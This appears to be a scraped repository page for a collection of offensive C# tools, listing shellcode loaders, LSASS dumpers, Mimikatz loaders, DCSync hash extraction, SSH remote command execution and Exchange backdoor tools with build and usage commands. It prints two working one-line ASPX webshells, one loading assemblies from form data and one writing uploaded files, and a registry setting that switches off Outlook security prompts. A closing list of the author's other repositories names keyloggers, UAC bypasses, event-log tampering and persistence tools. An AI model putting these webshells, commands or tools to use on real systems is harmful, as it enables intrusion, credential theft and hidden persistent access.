• Stars
    star
    169
  • Rank 224,453 (Top 5 %)
  • Language
    C#
  • Created almost 6 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

C Sharp codes of my blog.

Homework-of-C-Sharp

C Sharp codes of my blog.


Shellcode.cs

Use CreateThread to run shellcode.

ShellcodeBase64.txt

Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp)

ReadShellcode.cs

It will read ShellcodeBase64.txt and launch the shellcode.


DumpLsass.cs

Source code is https://github.com/GhostPack/SafetyKatz

Remove some functions of the source code,only used of dumping lsass.exe to the current path.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs

SafetyKatz.cs

Use to run sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file of lsass.exe.

All code from https://github.com/GhostPack/SafetyKatz

I just modified a few lines of code so that it can be compiled by csc.exe.

Eg.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe


GzipandBase64.cs

Use to generate the KatzCompressed string in PELoaderofMimikatz.cs

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs

PELoaderofMimikatz.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs

DcsyncofMimikatz.cs

This is the dcsync mode extracted from Mimikatz.

The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip

You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs

Usage:

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit


SharpMimikatz_x86.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

This is a 32-bit version.

Complie:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

or

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

Usage:

SharpMimikatz_x86.exe coffee exit

SharpMimikatz_x64.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

This is a 64-bit version.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

Usage:

SharpMimikatz_x64.exe coffee exit

SharpPELoaderGenerater.cs

Use to generate SharpPELoader.cs

Modified by 3gstudent

Reference:Casey Smith's PELoader.cs

Usage:

SharpPELoaderGenerater.exe <exe path>

Eg.

SharpPELoaderGenerater.exe mimikatz.exe

SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.

More details:

《通过.NET实现内存加载PE文件》


AddMachineAccountofDomain.cs

Reference:https://github.com/pkb1s/SharpAllowedToAct

This code is just part of SharpAllowedToAct.

It can be used to add a Machine Account(User:testNew,Password:123456789).

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll


mapi_tool.cs

Use MAPI to manage Outlook.

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

Usage:
     mapi_tool.exe GetAllFolders
     mapi_tool.exe GetConfig
     mapi_tool.exe ListMail <folder>
     mapi_tool.exe ListUnreadMail <folder>
Ex command:
     mapi_tool.exe GetConfigEx
     mapi_tool.exe GetContactsEx
     mapi_tool.exe GetGlobalAddressEx  
     mapi_tool.exe ListMailEx <folder>
     mapi_tool.exe ListUnreadMailEx <folder>
     mapi_tool.exe SaveAttachment <folder> <EntryID>  
     <folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
     When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt.
     You can modify the registry to turn off the Outlook security prompt.
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2

Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2010.

Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2013.


BrailleToASCII.cs

Use to translate Braille Patterns to ASCII characters.

Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs


SSLCertScan

Use to scan the website SSL certificate.

Reference:https://github.com/ryanries/SharpTLSScan

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs

SharpSSHCheck_SSH.NET.cs

Use to check the valid credential of SSH(Based on SSH.NET).

Support password and privatekeyfile.

Reference:https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
      <mode>:
      - plaintext
      - keyfile

Eg:

      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa

SharpSSHRunCmd_SSH.NET

Remote command execution via SSH(Based on SSH.NET).

Support password and privatekeyfile.

Reference:https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Complie:

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
      <mode>:
      - plaintext
      - keyfile
If the <cmd> is shell,you will get an interactive shell.

Eg:

      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps

ListUserMailbyLDAP

Use to export all users' mail by LDAP.

Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll

Usage:

      ListUserMailbyLDAP <LDAP ServerIP> <user> <password>

Eg:

      ListUserMailbyLDAP.exe 192.168.1.1 test1 password1

List_passwordneverexpires_user_byLDAP

Use to export all users with password_never_expires by LDAP.

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>

Eg:

      List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1

Add_passwordneverexpires_user_byLDAP

Use to set the selected user with password_never_expires by LDAP.

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user> 

Eg:

      Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1

SqlClient.cs

From:https://github.com/FortyNorthSecurity/SqlClient

Use to query the MSSQL database.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs

SharpADFindDemo.cs

Use to export the AD data by LDAP. Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll

Usage:

      SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
            
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname

Note:The maxsize is 1000.

Eg:

      SharpADFindDemo.exe 192.168.1.1 test1 password1 user

SharpExchangeBackdoor.cs

Python Version: SharpExchangeBackdoor.py

Use to send payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

XamlToViewState.cs

Use to create viewstate from XAML file

Usage:

    <xaml path> <generator> <key>

eg.

XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

SerializeXamlToViewState.cs

Use to create viewstate from Serialize Xaml data.

SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs

SharpExchangeDeserializeShell-NoAuth-ghostfile.cs

Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs

Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution. You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy<path>\web.config to implement deserializing code execution. <path>:owa or ecp Usage:

    <url> <key> <path>

eg.

    192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
    mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

SharpExchangeDumpHash.cs

Use to send payload to the Exchange webshell backdoor. The communication is encrypted by AES.

Support function:

  • generate : generate the webshell
  • dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
  • parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log

Usage:

    <url> <user> <password> <mode>

mode:

  • generate
  • dumplsass
  • parsedump

eg.

    SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
    SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump

SharpDCSync_krbtgt.cs

Use DRSR protocol to ask a domain controller to get the krbtgt's hash.

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin

SharpDCSync.cs

use DRSR protocol to ask a domain controller to synchronize a specified entry.

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpTGTImporter.cs

Use to import the TGT

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpGetUserLoginIPRPC.cs

Use RPC to get the login IP of domain users through the event log.

Support local and remote access

SharpGetUserLoginIPWMI.cs

Use WMI to get the login IP of domain users through the event log.

Support local and remote access


More Repositories

1

Pentest-and-Development-Tips

A collection of pentest and development tips
1,052
star
2

Homework-of-C-Language

C/C++ code examples of my blog.
C++
334
star
3

Worse-PDF

Turn a normal PDF file into malicious.Use to steal Net-NTLM Hashes from windows machines.
Python
331
star
4

Homework-of-Python

Python codes of my blog.
Python
321
star
5

List-RDP-Connections-History

Use powershell to list the RDP Connections History of logged-in users or all users
PowerShell
253
star
6

Eventlogedit-evtx--Evolution

Remove individual lines from Windows XML Event Log (EVTX) files
C++
246
star
7

Javascript-Backdoor

Learn from Casey Smith @subTee
PowerShell
242
star
8

Invoke-BuildAnonymousSMBServer

Use to build an anonymous SMB file server.
PowerShell
219
star
9

msbuild-inline-task

175
star
10

CLR-Injection

Use CLR to inject all the .NET apps
Batchfile
170
star
11

pyKerbrute

Use python to perform Kerberos pre-auth bruteforcing
Python
168
star
12

Inject-dll-by-APC

Asynchronous Procedure Calls
C++
163
star
13

SharpRDPCheck

Use to check the valid account of the Remote Desktop Protocol(Support plaintext and ntlmhash)
C#
154
star
14

Inject-dll-by-Process-Doppelganging

Process Doppelgänging
C
151
star
15

backup-3gstudent.github.io

old blog
SCSS
146
star
16

Smbtouch-Scanner

Automatically scan the inner network to detect whether they are vulnerable.
Python
140
star
17

ntfsDump

Use to copy a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
C++
110
star
18

Homework-of-Powershell

powershell codes of my blog.
PowerShell
93
star
19

Use-COM-objects-to-bypass-UAC

C++
86
star
20

Office-Persistence

Use powershell to test Office-based persistence methods
PowerShell
77
star
21

Windows-User-Clone

Create a hidden account
PowerShell
76
star
22

Windows-EventLog-Bypass

Use subProcessTag Value From TEB to identify Event Log Threads
C++
74
star
23

APT34-Jason

Use to perform Microsoft exchange account brute-force.
C#
74
star
24

pyXSSPlatform

Used to build an XSS platform on the command line.
Python
71
star
25

CVE-2017-8464-EXP

Support x86 and x64
67
star
26

bitsadminexec

Use bitsadmin to maintain persistence and bypass Autoruns
67
star
27

Code-Execution-and-Process-Injection

Powershell to CodeExecution and ProcessInjection
PowerShell
64
star
28

Shellcode-Generater

No inline asm,support x86/x64
C++
63
star
29

test

just test
C#
63
star
30

CreateRemoteThread

From 32-bit process to 64-bit process
C++
62
star
31

PasswordFilter

2 ways of Password Filter DLL to record the plaintext password
C++
61
star
32

Dump-Clear-Password-after-KB2871997-installed

PowerShell
59
star
33

From-System-authority-to-Medium-authority

Penetration test
C++
57
star
34

Waitfor-Persistence

Use Waitfor.exe to maintain persistence
PowerShell
54
star
35

Bypass-Windows-AppLocker

C
54
star
36

NinjaCopy

Powershell to copy ntds.dit
PowerShell
54
star
37

COM-Object-hijacking

use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)
PowerShell
54
star
38

3gstudent.github.io

Blog
SCSS
54
star
39

Winpcap_Install

Auto install WinPcap on Windows(command line)
Batchfile
52
star
40

ewsManage

My exercise of using Exchange Web Service(EWS)
C#
51
star
41

HiddenNtRegistry

Use NT Native Registry API to create a registry that normal user can not query.
C++
49
star
42

Homework-of-Go

Go code examples of my blog.
Go
49
star
43

signtools

From Windows SDK
47
star
44

Eventlogedit-evt--General

Remove individual lines from Windows Event Viewer Log (EVT) files
C++
44
star
45

PNG-Steganography

Steganography Payload
C++
44
star
46

easBrowseSharefile

Use to browse the share file by eas(Exchange Server ActiveSync)
Python
43
star
47

Bypass-McAfee-Application-Control--Code-Execution

source&exe
PowerShell
38
star
48

Smallp0wnedShell

Small modification version of p0wnedShell
C#
37
star
49

ListInstalledPrograms

List the programs that the current Windows system has installed
PowerShell
36
star
50

AutoIt-Keylogger

AutoIt
33
star
51

Hide-Process-by-kd.exe

powershell to hide process by kd.exe
PowerShell
33
star
52

NodeJS-Downloader

An example of a downloader written in NodeJS.
JavaScript
26
star
53

Use-msxsl-to-bypass-AppLocker

Learn from Casey Smith@subTee
XSLT
26
star
54

GetExpiredDomains

Search for available domain from expireddomains.net
Python
24
star
55

ExcelDllLoader

Execute DLL via the Excel.Application object's RegisterXLL() method
JavaScript
22
star
56

Add-Dll-Exports

Use to generate DLL through Visual Studio
C
19
star
57

Execute-CSharp-From-XSLT-TEST

XSLT
18
star
58

Writeup

interesting analysis
PowerShell
15
star
59

PNG_stego-test

LSB-test
C
12
star
60

SendMail-with-Attachments

Use powershell to send mail
PowerShell
11
star
61

Catch-specified-file-s-handle

Enumerate all processes and get specified file's handle,then close it.
C++
10
star
62

pdf

9
star
63

IE-BHO-POSTdata-Logger

A sample IE BHO for logging Internet Explorer's POST data.
C++
9
star
64

WanaCrypt0r-Reverse-Analysis

Record my reverse analysis of WanaCrypt0r
8
star
65

bgi-creater

Use BGInfo to bypass Application Whitelisting
PowerShell
7
star
66

Get-Wlan-Keys

Powershell to get wlan keys
PowerShell
7
star
67

Homework-of-Java

Java codes of my blog
Java
5
star
68

3gstudent

5
star
69

regsvr32-test

C++
4
star
70

Test-Exploit-for-Joomla-3.4.4-3.6.4

Test if the website allows user registration
Python
3
star
71

BlogPic

For blog post
2
star